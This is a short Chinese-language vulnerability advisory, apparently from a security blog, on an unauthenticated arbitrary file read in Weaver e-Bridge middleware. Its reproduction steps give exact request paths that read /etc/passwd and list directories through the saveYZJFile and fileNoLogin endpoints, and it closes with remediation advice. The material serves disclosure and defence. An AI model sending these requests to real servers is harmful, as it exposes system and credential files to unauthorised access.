泛微OA云桥 未授权任意文件读取

0x00 漏洞描述

泛微云桥（e-Bridge）是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞，攻击者成功利用该漏洞，可实现任意文件读取，获取敏感信息。

0x01 影响版本

2018-2019 多个版本。

0x02 漏洞复现

第一步：/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt，在返回包有id字符串

第二步：通过id值获取文件内容(/file/fileNoLogin/id)

1、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt，发现返回提示不存在文件或目录，通过linux对大小写敏感，判断目标使用了linux系统

2、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt，发现返回包中带有id

3、通过查看文件接口访问 /file/fileNoLogin/id

4、downloadUrl参数填写目录的绝对路径时，可以造成目录遍历

0x03 修复建议

1.关闭程序路由 /file/fileNoLogin

2.升级到最新版本

转载请注明：Adminxe's Blog » 泛微OA云桥 未授权任意文件读取